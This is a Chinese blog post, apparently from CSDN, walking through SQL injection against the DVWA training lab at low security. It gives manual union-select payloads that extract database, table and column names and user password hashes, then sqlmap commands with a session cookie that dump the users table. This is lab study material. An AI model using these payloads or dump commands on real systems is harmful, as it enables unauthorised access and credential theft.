DVWA靶场SQL注入漏洞(low)

已于 2022-01-18 22:09:18 修改
阅读量4k 收藏 20
点赞数 2
文章标签: web安全 sql
于 2022-01-18 22:08:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59343440/article/details/122557715
版权

目录

一:手工注入

 二.sqlmap注入

一:手工注入

手工注入常规思路:

1、判断是否存在注入,注入是字符型还是数字型

2、猜解SQL查询语句中的字段数

3、确定回显位置

4、获取当前数据库,获取数据库中的表,获取字段名

5、得到数据

判断是否存在注入

先在输入框输入1,可以得到正常回显

输入单引号',页面报错,存在注入漏洞

 输入1 and 1=1和 1 and 1=2,页面无变化

输入 1' or' 1'=' 1,字符型注入漏洞

查询字段数

 输入1' order by 2#,回显正常

 输入1' order by 3#报错,字段数为2

 判断回显位置

输入1' union select 1,2#

查库 

输入1' union select version(),database()#

 

查表

输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 

 查询字段

输入1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

获取用户名密码

输入1' union select user,password from users#

 二.sqlmap注入

查看地址http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#

查看cookie:PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low

在sqlmap命令行输入:sqlmap.py -u "http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low"

 发现提示有注入点,选no

查看数据库,输入:sqlmap.py -u "http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low" --current-db

查询表,输入 :sqlmap.py -u "http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low" --tables -D"dvwa"

 

查询user中的字段,输入:sqlmap.py -u "http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low" --columns -D"dvwa" -T"users"

 查询表中user,和passsword的信息,输入:sqlmap.py -u "http://dvwa:9000/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=c7q54cnrrkjae0qrja6v6nebh2; security=low" --dump -D"dvwa" -T"users" -C"user,password"

在途中遇到一点小问题

搬运解决图片

 得到最终结果

 

 
 

 


                

        

        

    




    

      

        

            

              
                
                  嗷呜一口大桃子
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    2
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    20
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
dvwa靶场sql注入low

				
			

			

				

					qq_14902381的博客
				

				

					08-22
					
					416
					
				

			

		

		

			
				
dvwa 靶场sql注入low

			
		

	



                

              
                



	

		

			

				
					
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析

				
			

			

				

					2401_84264630的博客
				

				

					05-09
					
					337
					
				

			

		

		

			
				
这样的话估计不能使用Error注入。结论:字段为2。

			
		

	



                


  
              

                


	

		

			

				
					
DVWA靶场SQL注入low

				
			

			

				

					qq_61975388的博客
				

				

					08-17
					
					591
					
				

			

		

		

			
				
DVWA靶场SQL注入实战

			
		

	





	

		

			

				
					
DVWAsql注入漏洞-low

				
			

			

				

					m0_63735735的博客
				

				

					07-19
					
					1674
					
				

			

		

		

			
				
DVWAsql注入漏洞-low

			
		

	



		

			
		



	

		

			

				
					
DVWA靶场SQL注入实测笔记(小白自查)-LOW SECURITY

				
			

			

				

					2401_83237906的博客
				

				

					04-06
					
					1037
					
				

			

		

		

			
				
所以联想到把0x7e换成database()是不是也能正常返回值,经过尝试,发现返回空,没报错都,所以这个0x7e不敢丢,直接加也不行,加逗号也不行(两个位置放3个参数),怎么合在一起,把两列变成一列?

			
		

	





	

		

			

				
					
DVWASQL注入漏洞

				
			

			

				

					weixin_56306210的博客
				

				

					01-30
					
					2430
					
				

			

		

		

			
				
DVWASQL注入漏洞

			
		

	





	

		

			

				
					
使用DVWA复现SQL注入漏洞(手工+sqlmap)

				
			

			

				

					m0_73818524的博客
				

				

					06-03
					
					1585
					
				

			

		

		

			
				
1.2.6安全和合规性:在进行实验时,务必遵守相关的安全和道德规范,不得未经授权对他人系统进行攻击或者侵入,同时保证实验的合规性和合法性通过实验四的完成,可以加深对于SQL注入漏洞的理解和认识,提升对于该类漏洞的识别和防范能力。实验目的回顾:本次实验的目的是通过使用DVWA靶场,手工和自动化工具(sqlmap)复现SQL注入漏洞,以加深对SQL注入漏洞的理解,提升漏洞识别和防范能力。理解SQL注入原理:在进行实验之前,需要理解SQL注入漏洞的原理和攻击方式,包括注入的定位、SQL语句的构造等。

			
		

	





	

		

			

				
					
DVWA靶场SQL注入通关详解

				
			

			

				

					qq_62169455的博客
				

				

					06-27
					
					3362
					
				

			

		

		

			
				
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。

			
		

	





	

		

			

				
					
小白打DVWA靶场sql injection注入LOW难度

				
			

			

				

					m0_61781411的博客
				

				

					09-12
					
					67
					
				

			

		

		

			
				
dvwa靶场sql注入low难度

			
		

	





	

		

			

				
					
DVWASQL注入漏洞SQLmap

				
			

			

				

					leaf_lucky的博客
				

				

					01-24
					
					643
					
				

			

		

		

			
				
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。

			
		

	





	

		

			

				
					
web安全基础学习

				
			

			

				

					m0_71332744的博客
				

				

					07-31
					
					397
					
				

			

		

		

			
				
记录学习的原理,少有实操持续更新

			
		

	





	

		

			

				
					
【网络安全】CR/LF注入+Race Condition绕过MFA

				
			

			

				

					等风来
				

				

					08-02
					
					179
					
				

			

		

		

			
				
ExaHub(此处为虚拟名称)是一个专为 Exa 编程语言的爱好者和专业人士量身定制的平台。Exa 语言以其出色的速度和性能而闻名,广泛应用于科学计算、机器学习和数据科学等领域。ExaHub 提供了集中式的枢纽,用户可以访问各种资源,协作开展项目,并利用专为 Julia 生态系统定制的工具。CR/LF(回车/换行)注入是一种安全漏洞。CR/LF指的是两个ASCII控制字符的序列:回车(CR,ASCII码13)和换行(LF,ASCII码10)。

			
		

	





	

		

			

				
					
汽车网络安全 -- MAC介绍:CMAC与CBC-MAC不能混为一谈

				
			

			

				

					认真搞搞汽车MCU
				

				

					08-02
					
					236
					
				

			

		

		

			
				
MAC全称Message authentication code,是经过特定算法后产生的一小段数据信息,用于校验某数据的完整性和真实性。在数据传递过程中,可检查其内容是否被更改过,不管更改的原因是来自意外或是蓄意攻击。同时可以作为数据来源的身份验证,确认数据的来源。常见的MAC算法包括CMAC和HMAC。

			
		

	





	

		

			

				
					
网络安全(黑客)—自学手册

				
			

			

				

					dexi113的博客
				

				

					08-05
					
					698
					
				

			

		

		

			
				
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

			
		

	





	

		

			

				
					
自学黑客(网络安全

					
最新发布

				
			

			

				

					2301_77160226的博客
				

				

					08-05
					
					1450
					
				

			

		

		

			
				
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。

			
		

	





	

		

			

				
					
【等保测评】网络安全服务认证技术规范(等级保护测评)

				
			

			

				

					weixin_45840241的博客
				

				

					08-02
					
					654
					
				

			

		

		

			
				
5.1.3.4 报告编制阶段,应客观描述等级保护对象已采取的有效保护措施和存在的主要安全问题情况, 指出等级保护对象安全保护现状与相应等级的保护要求之间的差距,分析差距可能导致被测评系统面临的风险,给出等级保护测评结论,形成测评报告,测评报告应依据公安行政主管部门统一制订的网络安全等级保护测评报告模版的格式和内容要求编写,测评报告应通过评审并有相关记录。依据 GB/T 36959 提出的等级保护测评服务人员能力要求, 经授权的等级保护测评人员能力评估机构考核通过的专业测评技术人员。

			
		

	





	

		

			

				
					
CCRC-DSA数据安全评估师:加快构建大网络安全工作格局

				
			

			

				

					2402_84109700的博客
				

				

					08-05
					
					242
					
				

			

		

		

			
				
网络安全是一个复杂的系统工程,涉及多个领域和方面,不仅政府需要负责,全社会也应共同参与维护网络安全的工作,包括企业、社会组织和广大网民等。中央网信办愿意与所有相关方携手合作,共同加强国家网络安全防线,推动网络安全向更高质量发展迈进,为国家的强盛和民族的复兴提供坚实的保障。王京涛在讲话中提到,党的二十届三中全会强调必须加强网络安全体制的构建,并建立人工智能的安全监管机制。最后,要巩固工作基础,促进教育、技术与产业的融合发展,建立一个健康的生态系统。工信部电子标准化研究院。

			
		

	





	

		

			

				
					
阿一网络安全学院之绕过CDN发现服务器真实IP

				
			

			

				

					Ayixy的博客
				

				

					08-02
					
					272
					
				

			

		

		

			
				
用了无数节都查不到,真的有 CDN 吗……使用访问错误目录获得报错信息成功。和方法二获得的 IP 一样。使用网络测绘搜索引擎查询。

			
		

	





	

		

			

				
					
dvwa靶场sql注入初级

				
			

			

				

					07-27
				

			

		

		

			
				
6. 如果页面显示了错误信息,说明存在SQL注入漏洞。  7. 接下来,你可以尝试使用一些常见的SQL注入技巧,例如添加`OR '1'='1`到用户名或密码字段中,然后击"Submit"按钮。  8. 如果页面成功返回了数据,说明你成功...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值